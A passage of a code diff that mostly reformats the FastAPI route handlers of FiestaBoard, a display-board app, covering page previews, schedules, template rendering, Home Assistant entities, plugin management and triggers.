     try:
-        with open(_STAFF_PICKS_PATH) as f:
+        with _STAFF_PICKS_PATH.open() as f:
             return json.load(f)
     except FileNotFoundError:
         return []
@@ -6210,11 +6081,7 @@ def _load_staff_picks() -> list:
 async def list_staff_picks():
     """Return all staff picks (without share strings)."""
     picks = _load_staff_picks()
-    return [
-        {k: v for k, v in pick.items() if k != "share_string"}
-        for pick in picks
-    ]
-
+    return [{k: v for k, v in pick.items() if k != "share_string"} for pick in picks]
 
 
 @app.get("/staff-picks/{pick_id}/share")
@@ -6229,8 +6096,7 @@ async def get_staff_pick_share(pick_id: str):
 
 @app.post("/pages/{page_id}/preview")
 async def preview_page(
-    page_id: str,
-    force_refresh: bool = Query(default=False, description="Force fresh render, bypass cache")
+    page_id: str, force_refresh: bool = Query(default=False, description="Force fresh render, bypass cache")
 ):
     """
     Preview a page's rendered output.
@@ -6264,9 +6130,9 @@ async def preview_page(
     return {
         "page_id": page_id,
         "message": result.formatted,
-        "lines": result.formatted.split('\n'),
+        "lines": result.formatted.split("\n"),
         "display_type": result.display_type,
-        "raw": result.raw
+        "raw": result.raw,
     }
 
 
@@ -6307,29 +6173,23 @@ async def preview_pages_batch(request: dict):
     for page_id in page_ids:
         result = batch_results.get(page_id)
         if result is None:
-            results[page_id] = {
-                "error": "Page not found",
-                "available": False
-            }
+            results[page_id] = {"error": "Page not found", "available": False}
         elif not result.available:
-            results[page_id] = {
-                "error": result.error or "Page rendering failed",
-                "available": False
-            }
+            results[page_id] = {"error": result.error or "Page rendering failed", "available": False}
         else:
             results[page_id] = {
                 "page_id": page_id,
                 "message": result.formatted,
-                "lines": result.formatted.split('\n'),
+                "lines": result.formatted.split("\n"),
                 "display_type": result.display_type,
                 "raw": result.raw,
-                "available": True
+                "available": True,
             }
 
     return {
         "previews": results,
         "total": len(page_ids),
-        "successful": sum(1 for r in results.values() if r.get("available", False))
+        "successful": sum(1 for r in results.values() if r.get("available", False)),
     }
 
 
@@ -6346,7 +6206,7 @@ async def get_page_cache_stats():
 
 
 @app.post("/pages/cache/clear")
-async def clear_page_cache(request: dict = None):
+async def clear_page_cache(request: dict | None = None):
     """
     Clear preview cache.
 
@@ -6367,15 +6227,8 @@ async def clear_page_cache(request: dict = None):
     page_service._invalidate_cache(page_id)
 
     if page_id:
-        return {
-            "status": "success",
-            "message": f"Cache cleared for page {page_id}"
-        }
-    else:
-        return {
-            "status": "success",
-            "message": "All preview caches cleared"
-        }
+        return {"status": "success", "message": f"Cache cleared for page {page_id}"}
+    return {"status": "success", "message": "All preview caches cleared"}
 
 
 @app.post("/pages/{page_id}/send")
@@ -6388,10 +6241,7 @@ async def send_page(page_id: str, target: str | None = None):
         target: Override output target (ui, board, both)
     """
     if target is not None and target not in VALID_OUTPUT_TARGETS:
-        raise HTTPException(
-            status_code=400,
-            detail=f"Invalid target: {target}. Valid targets: {VALID_OUTPUT_TARGETS}"
-        )
+        raise HTTPException(status_code=400, detail=f"Invalid target: {target}. Valid targets: {VALID_OUTPUT_TARGETS}")
 
     page_service = get_page_service()
     settings_service = get_settings_service()
@@ -6431,17 +6281,20 @@ async def send_page(page_id: str, target: str | None = None):
             # Use page-level transitions if set, otherwise fall back to system defaults
             system_transition = settings_service.get_transition_settings()
             strategy = page.transition_strategy if page.transition_strategy else system_transition.strategy
-            interval_ms = page.transition_interval_ms if page.transition_interval_ms is not None else system_transition.step_interval_ms
-            step_size = page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
+            interval_ms = (
+                page.transition_interval_ms
+                if page.transition_interval_ms is not None
+                else system_transition.step_interval_ms
+            )
+            step_size = (
+                page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
+            )
 
             # Convert to board array with dimensions for page's device type (flagship vs note)
             dims = get_dimensions(page.device_type)
             board_array = text_to_board_array(result.formatted, rows=dims.rows, cols=dims.cols)
             success, was_sent = service.vb_client.send_characters(
-                board_array,
-                strategy=strategy,
-                step_interval_ms=interval_ms,
-                step_size=step_size
+                board_array, strategy=strategy, step_interval_ms=interval_ms, step_size=step_size
             )
             sent_to_board = was_sent
             if not success:
@@ -6461,6 +6314,7 @@ async def send_page(page_id: str, target: str | None = None):
 # =============================================================================
 # Schedule Endpoints
 # =============================================================================
+
 
 def _enrich_schedule_with_sun_times(schedule_dict: dict) -> dict:
     """Add resolved_start_time / resolved_end_time to a schedule dict.
@@ -6502,6 +6356,7 @@ def _enrich_schedule_with_sun_times(schedule_dict: dict) -> dict:
     schedule_dict["resolved_start_time"] = resolved_start
     schedule_dict["resolved_end_time"] = resolved_end
     return schedule_dict
+
 
 @app.get("/schedules")
 async def list_schedules(board_id: str | None = None):
@@ -6552,6 +6407,7 @@ async def create_schedule(schedule_data: ScheduleCreate):
 # Specific routes must come BEFORE parameterized routes
 # to avoid /schedules/{schedule_id} matching everything
 
+
 @app.get("/schedules/active/page")
 async def get_active_schedule(board_id: str | None = None):
     """Get the currently active page based on schedule (optional query: board_id=)."""
@@ -6578,6 +6434,7 @@ async def get_active_schedule(board_id: str | None = None):
             "temporary_override": temporary_override_payload,
         }
     from .time_service import get_time_service
+
     time_service = get_time_service()
     now = time_service.get_current_time()
     current_time = now.time()
@@ -6658,6 +6515,7 @@ async def set_schedule_enabled(request: dict):
 
 # Parameterized routes come LAST to avoid matching specific paths
 
+
 @app.get("/schedules/{schedule_id}")
 async def get_schedule(schedule_id: str):
     """Get a schedule entry by ID.
@@ -6715,15 +6573,13 @@ async def delete_schedule(schedule_id: str):
     if not deleted:
         raise HTTPException(status_code=404, detail=f"Schedule not found: {schedule_id}")
 
-    return {
-        "status": "success",
-        "message": f"Schedule {schedule_id} deleted"
-    }
+    return {"status": "success", "message": f"Schedule {schedule_id} deleted"}
 
 
 # =============================================================================
 # Carousel Endpoints
 # =============================================================================
+
 
 @app.get("/carousels")
 async def list_carousels():
@@ -6797,6 +6653,7 @@ async def delete_carousel(carousel_id: str):
 # Template Endpoints
 # =============================================================================
 
+
 @app.get("/templates/variables")
 async def get_template_variables():
     """
@@ -6810,7 +6667,7 @@ async def get_template_variables():
     template_engine = get_template_engine()
     registry = get_plugin_registry()
 
-    result = {
+    return {
         "variables": template_engine.get_available_variables(),
         "max_lengths": template_engine.get_variable_max_lengths(),
         "variable_metadata": registry.get_all_variables_with_metadata(),
@@ -6830,12 +6687,12 @@ async def get_template_variables():
         "formatting": {
             "fill_space": {
                 "syntax": "{{fill_space}}",
-                "description": "Expands to fill remaining space on the line. Use multiple for multi-column layouts."
+                "description": "Expands to fill remaining space on the line. Use multiple for multi-column layouts.",
             },
             "fill_space_repeat": {
                 "syntax": "{{fill_space_repeat:pattern}}",
-                "description": "Fills remaining space with repeating colors or characters. Examples: {{fill_space_repeat:red}} or {{fill_space_repeat:-}}"
-            }
+                "description": "Fills remaining space with repeating colors or characters. Examples: {{fill_space_repeat:red}} or {{fill_space_repeat:-}}",
+            },
         },
         "syntax_examples": {
             "variable": "{{weather.temperature}}",
@@ -6846,9 +6703,8 @@ async def get_template_variables():
             "wrap": "{{star_trek.quote|wrap}}",
             "fill_space": "Left{{fill_space}}Right",
             "fill_space_three_columns": "A{{fill_space}}B{{fill_space}}C",
-        }
+        },
     }
-    return result
 
 
 @app.post("/templates/validate")
@@ -6868,17 +6724,14 @@ async def validate_template(request: dict):
 
     # Handle both string and list input
     if isinstance(template, list):
-        template = '\n'.join(template)
+        template = "\n".join(template)
 
     template_engine = get_template_engine()
     errors = template_engine.validate_template(template)
 
     return {
         "valid": len(errors) == 0,
-        "errors": [
-            {"line": e.line, "column": e.column, "message": e.message}
-            for e in errors
-        ]
+        "errors": [{"line": e.line, "column": e.column, "message": e.message} for e in errors],
     }
 
 
@@ -6913,24 +6766,16 @@ async def render_template(request: dict):
 
     # Determine line count from device type
     from .devices import DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS
-    dims = DEVICE_DIMENSIONS.get(device_type or DEFAULT_DEVICE_TYPE,
-                                  DEVICE_DIMENSIONS[DEFAULT_DEVICE_TYPE])
+
+    dims = DEVICE_DIMENSIONS.get(device_type or DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS[DEFAULT_DEVICE_TYPE])
     num_rows = dims.rows
 
     # Early return for empty templates to avoid unnecessary processing
     if isinstance(template, list):
         if not template or all(not line.strip() for line in template):
-            return {
-                "rendered": "\n".join([""] * num_rows),
-                "lines": [""] * num_rows,
-                "line_count": num_rows
-            }
+            return {"rendered": "\n".join([""] * num_rows), "lines": [""] * num_rows, "line_count": num_rows}
     elif isinstance(template, str) and not template.strip():
-        return {
-            "rendered": "\n".join([""] * num_rows),
-            "lines": [""] * num_rows,
-            "line_count": num_rows
-        }
+        return {"rendered": "\n".join([""] * num_rows), "lines": [""] * num_rows, "line_count": num_rows}
 
     template_engine = get_template_engine()
     line_metadata = request.get("line_metadata")
@@ -6943,14 +6788,10 @@ async def render_template(request: dict):
             logger.info(f"Rendering template string: {template}")
             rendered = template_engine.render(template)
 
-        return {
-            "rendered": rendered,
-            "lines": rendered.split('\n'),
-            "line_count": len(rendered.split('\n'))
-        }
+        return {"rendered": rendered, "lines": rendered.split("\n"), "line_count": len(rendered.split("\n"))}
     except Exception as e:
         logger.error(f"Template rendering error: {e}", exc_info=True)
-        raise HTTPException(status_code=400, detail=f"Template rendering failed: {str(e)}") from e
+        raise HTTPException(status_code=400, detail=f"Template rendering failed: {e!s}") from e
 
 
 @app.post("/templates/render/live")
@@ -6977,8 +6818,8 @@ async def render_template_live(request: dict):
 
     # Determine line count from device type
     from .devices import DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS
-    dims = DEVICE_DIMENSIONS.get(device_type or DEFAULT_DEVICE_TYPE,
-                                  DEVICE_DIMENSIONS[DEFAULT_DEVICE_TYPE])
+
+    dims = DEVICE_DIMENSIONS.get(device_type or DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS[DEFAULT_DEVICE_TYPE])
     num_rows = dims.rows
 
     # Render the template
@@ -7005,7 +6846,7 @@ async def render_template_live(request: dict):
             rendered = template_engine.render(template)
     except Exception as e:
         logger.error(f"Template rendering error: {e}", exc_info=True)
-        raise HTTPException(status_code=400, detail=f"Template rendering failed: {str(e)}") from e
+        raise HTTPException(status_code=400, detail=f"Template rendering failed: {e!s}") from e
 
     # Find the target board
     board_settings = settings_service.get_board_settings()
@@ -7046,8 +6887,8 @@ async def render_template_live(request: dict):
 
     return {
         "rendered": rendered,
-        "lines": rendered.split('\n'),
-        "line_count": len(rendered.split('\n')),
+        "lines": rendered.split("\n"),
+        "line_count": len(rendered.split("\n")),
         "sent_to_board": sent_to_board,
         "board_id": target_board.get("id") if target_board else None,
     }
@@ -7079,7 +6920,6 @@ async def clear_cache():
     return {"status": "success", "message": "Cache cleared - next update will be sent to board"}
 
 
-
 @app.post("/force-refresh")
 async def force_refresh():
     """
@@ -7101,12 +6941,13 @@ async def force_refresh():
         return {"status": "success", "message": "Display force-refreshed successfully"}
     except Exception as e:
         logger.error(f"Error force-refreshing display: {e}")
-        raise HTTPException(status_code=500, detail=f"Failed to force refresh: {str(e)}") from e
+        raise HTTPException(status_code=500, detail=f"Failed to force refresh: {e!s}") from e
 
 
 # =============================================================================
 # Home Assistant Endpoints
 # =============================================================================
+
 
 @app.get("/home-assistant/entities")
 async def get_home_assistant_entities():
@@ -7137,15 +6978,17 @@ async def get_home_assistant_entities():
         result_entities = []
         for e in entities:
             attrs = e.get("attributes") or {}
-            result_entities.append({
-                "entity_id": e["entity_id"],
-                "state": e["state"],
-                "attributes": attrs,
-                "friendly_name": attrs.get("friendly_name", e["entity_id"]),
-            })
+            result_entities.append(
+                {
+                    "entity_id": e["entity_id"],
+                    "state": e["state"],
+                    "attributes": attrs,
+                    "friendly_name": attrs.get("friendly_name", e["entity_id"]),
+                }
+            )
         return {"entities": result_entities}
     except Exception as e:
-        raise HTTPException(status_code=503, detail=f"Failed to fetch entities: {str(e)}") from e
+        raise HTTPException(status_code=503, detail=f"Failed to fetch entities: {e!s}") from e
 
 
 # Legacy endpoints /preview and /publish-preview have been removed.
@@ -7160,6 +7003,7 @@ async def get_home_assistant_entities():
 # Import plugin system
 try:
     from .plugins import get_plugin_registry
+
     PLUGIN_SYSTEM_AVAILABLE = True
 except ImportError:
     PLUGIN_SYSTEM_AVAILABLE = False
@@ -7168,11 +7012,13 @@ except ImportError:
 
 class PluginConfigRequest(BaseModel):
     """Request body for plugin configuration updates."""
+
     config: dict[str, Any]
 
 
 class PluginEnableRequest(BaseModel):
     """Request body for enabling/disabling a plugin."""
+
     enabled: bool
 
 
@@ -7184,10 +7030,7 @@ async def list_plugins():
     Returns plugins with their status, metadata, and whether they're enabled.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503,
-            detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
     plugins = registry.list_plugins()
@@ -7208,7 +7051,7 @@ async def list_plugins():
         "plugins": plugins,
         "plugin_system_enabled": True,
         "total": len(plugins),
-        "enabled_count": sum(1 for p in plugins if p.get("enabled", False))
+        "enabled_count": sum(1 for p in plugins if p.get("enabled", False)),
     }
 
 
@@ -7225,7 +7068,7 @@ async def get_all_plugin_variables():
         return {
             "variables": template_engine.get_available_variables(),
             "max_lengths": template_engine.get_variable_max_lengths(),
-            "plugin_system_enabled": False
+            "plugin_system_enabled": False,
         }
 
     registry = get_plugin_registry()
@@ -7233,7 +7076,7 @@ async def get_all_plugin_variables():
     return {
         "variables": registry.get_all_variables(),
         "max_lengths": registry.get_all_max_lengths(),
-        "plugin_system_enabled": True
+        "plugin_system_enabled": True,
     }
 
 
@@ -7245,17 +7088,11 @@ async def get_plugin_errors():
     Returns errors from plugins that failed to load.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        return {
-            "errors": {},
-            "plugin_system_enabled": False
-        }
+        return {"errors": {}, "plugin_system_enabled": False}
 
     registry = get_plugin_registry()
 
-    return {
-        "errors": registry.get_load_errors(),
-        "plugin_system_enabled": True
-    }
+    return {"errors": registry.get_load_errors(), "plugin_system_enabled": True}
 
 
 @app.get("/plugins/registry")
@@ -7266,9 +7103,7 @@ async def list_registry_plugins():
     Returns registry entries with their installation status.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
 
@@ -7287,9 +7122,7 @@ async def get_plugin_updates():
     ``POST /plugins/updates/check`` to trigger an immediate check.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
     return {"updates": registry.get_update_status()}
@@ -7303,19 +7136,13 @@ async def get_plugin(plugin_id: str):
     Returns the plugin's manifest, configuration, and status.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503,
-            detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
     manifest = registry.get_manifest(plugin_id)
 
     if not manifest:
-        raise HTTPException(
-            status_code=404,
-            detail=f"Plugin not found: {plugin_id}"
-        )
+        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
 
     # Get configuration
     config_manager = get_config_manager()
@@ -7326,8 +7153,9 @@ async def get_plugin(plugin_id: str):
     demo_page_id = None
     if has_demo:
         page_service = get_page_service()
-        demo_page = page_service.get_demo_page(plugin_id, device_type="flagship") \
-            or page_service.get_demo_page(plugin_id)
+        demo_page = page_service.get_demo_page(plugin_id, device_type="flagship") or page_service.get_demo_page(
+            plugin_id
+        )
         if demo_page:
             demo_page_id = demo_page.id
 
@@ -7366,19 +7194,13 @@ async def get_plugin_manifest(plugin_id: str):
     Returns the raw manifest data for UI rendering.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503,
-            detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
     manifest = registry.get_manifest(plugin_id)
 
     if not manifest:
-        raise HTTPException(
-            status_code=404,
-            detail=f"Plugin not found: {plugin_id}"
-        )
+        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
 
     return manifest.raw
 
@@ -7402,28 +7224,19 @@ async def update_plugin_config(plugin_id: str, request: PluginConfigRequest):
     }
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503,
-            detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
 
     # Check if plugin exists
     if not registry.get_plugin(plugin_id):
-        raise HTTPException(
-            status_code=404,
-            detail=f"Plugin not found: {plugin_id}"
-        )
+        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
 
     # Validate configuration against manifest schema
     errors = registry.set_plugin_config(plugin_id, request.config)
     if errors:
         logger.error(f"Plugin '{plugin_id}' config validation failed: {errors}")
-        raise HTTPException(
-            status_code=400,
-            detail={"errors": errors}
-        )
+        raise HTTPException(status_code=400, detail={"errors": errors})
 
     # Save to config file
     config_manager = get_config_manager()
@@ -7441,7 +7254,7 @@ async def update_plugin_config(plugin_id: str, request: PluginConfigRequest):
     return {
         "status": "success",
         "plugin_id": plugin_id,
-        "config": config_manager._mask_sensitive(updated) if updated else {}
+        "config": config_manager._mask_sensitive(updated) if updated else {},
     }
 
 
@@ -7453,26 +7266,17 @@ async def enable_plugin(plugin_id: str):
     Enables the plugin in both the registry and persists to config.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503,
-            detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
 
     if not registry.get_plugin(plugin_id):
-        raise HTTPException(
-            status_code=404,
-            detail=f"Plugin not found: {plugin_id}"
-        )
+        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
 
     # Enable in registry
     success = registry.enable_plugin(plugin_id)
     if not success:
-        raise HTTPException(
-            status_code=400,
-            detail=f"Failed to enable plugin: {plugin_id}"
-        )
+        raise HTTPException(status_code=400, detail=f"Failed to enable plugin: {plugin_id}")
 
     # Persist to config
     config_manager = get_config_manager()
@@ -7484,11 +7288,7 @@ async def enable_plugin(plugin_id: str):
 
     logger.info(f"Plugin '{plugin_id}' enabled")
 
-    return {
-        "status": "success",
-        "plugin_id": plugin_id,
-        "enabled": True
-    }
+    return {"status": "success", "plugin_id": plugin_id, "enabled": True}
 
 
 @app.post("/plugins/{plugin_id}/disable")
@@ -7499,26 +7299,17 @@ async def disable_plugin(plugin_id: str):
     Disables the plugin in both the registry and persists to config.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503,
-            detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
 
     if not registry.get_plugin(plugin_id):
-        raise HTTPException(
-            status_code=404,
-            detail=f"Plugin not found: {plugin_id}"
-        )
+        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
 
     # Disable in registry
     success = registry.disable_plugin(plugin_id)
     if not success:
-        raise HTTPException(
-            status_code=400,
-            detail=f"Failed to disable plugin: {plugin_id}"
-        )
+        raise HTTPException(status_code=400, detail=f"Failed to disable plugin: {plugin_id}")
 
     # Persist to config
     config_manager = get_config_manager()
@@ -7530,11 +7321,7 @@ async def disable_plugin(plugin_id: str):
 
     logger.info(f"Plugin '{plugin_id}' disabled")
 
-    return {
-        "status": "success",
-        "plugin_id": plugin_id,
-        "enabled": False
-    }
+    return {"status": "success", "plugin_id": plugin_id, "enabled": False}
 
 
 @app.get("/plugins/{plugin_id}/data")
@@ -7545,41 +7332,29 @@ async def get_plugin_data(plugin_id: str):
     Returns the plugin's latest data, formatted output, and status.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503,
-            detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
 
     if not registry.get_plugin(plugin_id):
-        raise HTTPException(
-            status_code=404,
-            detail=f"Plugin not found: {plugin_id}"
-        )
+        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
 
     if not registry.is_enabled(plugin_id):
-        raise HTTPException(
-            status_code=400,
-            detail=f"Plugin not enabled: {plugin_id}"
-        )
+        raise HTTPException(status_code=400, detail=f"Plugin not enabled: {plugin_id}")
 
     result = registry.fetch_plugin_data(plugin_id)
 
     # Return 503 when plugin data is unavailable (e.g. not configured, auth failure)
     # so monitoring (Grafana) and request log show it as an error for triage
     if not result.available:
-        raise HTTPException(
-            status_code=503,
-            detail=result.error or "Plugin data not available"
-        )
+        raise HTTPException(status_code=503, detail=result.error or "Plugin data not available")
 
     return {
         "plugin_id": plugin_id,
         "available": result.available,
         "data": result.data,
         "formatted_lines": result.formatted_lines,
-        "error": result.error
+        "error": result.error,
     }
 
 
@@ -7591,25 +7366,19 @@ async def get_plugin_variables(plugin_id: str):
     Returns the variables schema for use in the template editor.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503,
-            detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
     manifest = registry.get_manifest(plugin_id)
 
     if not manifest:
-        raise HTTPException(
-            status_code=404,
-            detail=f"Plugin not found: {plugin_id}"
-        )
+        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
 
     return {
         "plugin_id": plugin_id,
         "variables": manifest.raw.get("variables", {}),
         "max_lengths": manifest.max_lengths,
-        "color_rules_schema": manifest.raw.get("color_rules_schema", {})
+        "color_rules_schema": manifest.raw.get("color_rules_schema", {}),
     }
 
 
@@ -7680,15 +7449,12 @@ async def create_plugin_demo_page(plugin_id: str, device_type: str = "flagship")
     if required_fields:
         config_manager = get_config_manager()
         plugin_config = config_manager.get_plugin_config(plugin_id) or {}
-        missing = [
-            f for f in required_fields
-            if f != "enabled" and not plugin_config.get(f)
-        ]
+        missing = [f for f in required_fields if f != "enabled" and not plugin_config.get(f)]
         if missing:
             raise HTTPException(
                 status_code=400,
                 detail=f"Required settings not configured: {', '.join(missing)}. "
-                       f"Configure them first before creating a demo page.",
+                f"Configure them first before creating a demo page.",
             )
 
     page_service = get_page_service()
@@ -7705,6 +7471,7 @@ async def create_plugin_demo_page(plugin_id: str, device_type: str = "flagship")
 
 class PluginInstanceCreateRequest(BaseModel):
     """Request body for creating a new plugin instance."""
+
     label: str
 
 
@@ -7716,9 +7483,7 @@ async def list_plugin_instances(plugin_id: str):
     Returns the instances (excluding the base) for the given plugin.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
 
@@ -7726,10 +7491,7 @@ async def list_plugin_instances(plugin_id: str):
     base_id, _ = registry.parse_instance_key(plugin_id)
 
     if not registry.get_plugin(base_id):
-        raise HTTPException(
-            status_code=404,
-            detail=f"Plugin not found: {base_id}"
-        )
+        raise HTTPException(status_code=404, detail=f"Plugin not found: {base_id}")
 
     instances = registry.list_instances(base_id)
 
@@ -7751,9 +7513,7 @@ async def create_plugin_instance(plugin_id: str, request: PluginInstanceCreateRe
     ``{plugin_id}:{label}``.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
 
@@ -7761,10 +7521,7 @@ async def create_plugin_instance(plugin_id: str, request: PluginInstanceCreateRe
     base_id, _ = registry.parse_instance_key(plugin_id)
 
     if not registry.get_plugin(base_id):
-        raise HTTPException(
-            status_code=404,
-            detail=f"Plugin not found: {base_id}"
-        )
+        raise HTTPException(status_code=404, detail=f"Plugin not found: {base_id}")
 
     errors = registry.create_instance(base_id, request.label)
     if errors:
@@ -7799,9 +7556,7 @@ async def delete_plugin_instance(plugin_id: str, instance_label: str):
     Removes the instance from the registry and its persisted configuration.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
 
@@ -7885,6 +7640,7 @@ async def receive_plugin_payload(plugin_id: str, request: Request):
 
 class ExternalPluginInstallRequest(BaseModel):
     """Request body for installing an external plugin."""
+
     repository: str
     plugin_id: str | None = None
     branch: str = ""
@@ -7896,9 +7652,7 @@ async def install_registry_plugin(plugin_id: str):
     Install a plugin from the curated registry by its id.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
     errors = registry.install_from_registry(plugin_id)
@@ -7922,13 +7676,12 @@ async def install_external_plugin(request: ExternalPluginInstallRequest):
     naming convention (that requirement only applies to registry plugins).
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     safe_branch = request.branch or ""
     if safe_branch:
         from .plugins.sources import _validate_git_ref
+
         _ok, _err = _validate_git_ref(safe_branch)
         if not _ok:
             raise HTTPException(status_code=400, detail=_err)
@@ -7949,6 +7702,7 @@ async def install_external_plugin(request: ExternalPluginInstallRequest):
     pid = safe_plugin_id
     if pid is None:
         from .plugins.sources import plugin_id_from_repo_name, repo_name_from_url
+
         pid = plugin_id_from_repo_name(repo_name_from_url(request.repository))
 
     return {
@@ -7966,17 +7720,13 @@ async def uninstall_external_plugin(plugin_id: str):
     Built-in plugins shipped with FiestaBoard cannot be uninstalled.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
 
     # Collect instance compound keys before uninstall so we can purge their configs
     instance_keys = [
-        p["id"]
-        for p in registry.list_plugins()
-        if p.get("base_plugin_id") == plugin_id and p.get("instance_label")
+        p["id"] for p in registry.list_plugins() if p.get("base_plugin_id") == plugin_id and p.get("instance_label")
     ]
 
     errors = registry.uninstall_external_plugin(plugin_id)
@@ -8004,9 +7754,7 @@ async def trigger_plugin_update_check():
     pool so the event loop is not blocked.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
     loop = asyncio.get_event_loop()
@@ -8026,9 +7774,7 @@ async def update_plugin(plugin_id: str):
     Built-in plugins cannot be updated via this endpoint.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
     source = registry.get_plugin_source(plugin_id)
@@ -8102,14 +7848,10 @@ async def apply_all_plugin_updates():
     inspect partial results.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     registry = get_plugin_registry()
-    pending = [
-        pid for pid, has_update in registry.get_update_status().items() if has_update
-    ]
+    pending = [pid for pid, has_update in registry.get_update_status().items() if has_update]
 
     if not pending:
         return {"updated": [], "failed": {}, "message": "No updates available."}
@@ -8171,10 +7913,12 @@ async def apply_all_plugin_updates():
 # Triggers — Event-based plugin messages
 # =============================================================================
 
+
 @app.get("/triggers")
 async def list_triggers():
     """List all active triggers with their status."""
     from .triggers.service import get_trigger_service
+
     trigger_service = get_trigger_service()
     active = trigger_service.list_active_triggers()
     return {
@@ -8187,6 +7931,7 @@ async def list_triggers():
 async def get_active_trigger():
     """Get the current highest-priority active trigger, if any."""
     from .triggers.service import get_trigger_service
+
     trigger_service = get_trigger_service()
     active = trigger_service.get_active_trigger()
     if active is None:
@@ -8198,6 +7943,7 @@ async def get_active_trigger():
 async def dismiss_trigger(trigger_id: str):
     """Dismiss (remove) a specific trigger by its id."""
     from .triggers.service import get_trigger_service
+
     trigger_service = get_trigger_service()
     dismissed = trigger_service.dismiss_trigger(trigger_id)
     if not dismissed:
@@ -8209,6 +7955,7 @@ async def dismiss_trigger(trigger_id: str):
 async def clear_triggers():
     """Clear all active triggers."""
     from .triggers.service import get_trigger_service
+
     trigger_service = get_trigger_service()
     trigger_service.clear_all()
     return {"status": "cleared"}
@@ -8222,11 +7969,10 @@ async def check_triggers():
     endpoint allows the UI or external systems to force an immediate check.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(
-            status_code=503, detail="Plugin system is not available."
-        )
+        raise HTTPException(status_code=503, detail="Plugin system is not available.")
 
     from .triggers.service import get_trigger_service
+
     registry = get_plugin_registry()
     trigger_service = get_trigger_service()
 
@@ -8246,6 +7992,7 @@ async def check_triggers():
 # =============================================================================
 # Generic Data Plugin — Test Fetch
 # =============================================================================
+
 
 @app.post("/generic-data/test-fetch")
 async def generic_data_test_fetch(request: dict):
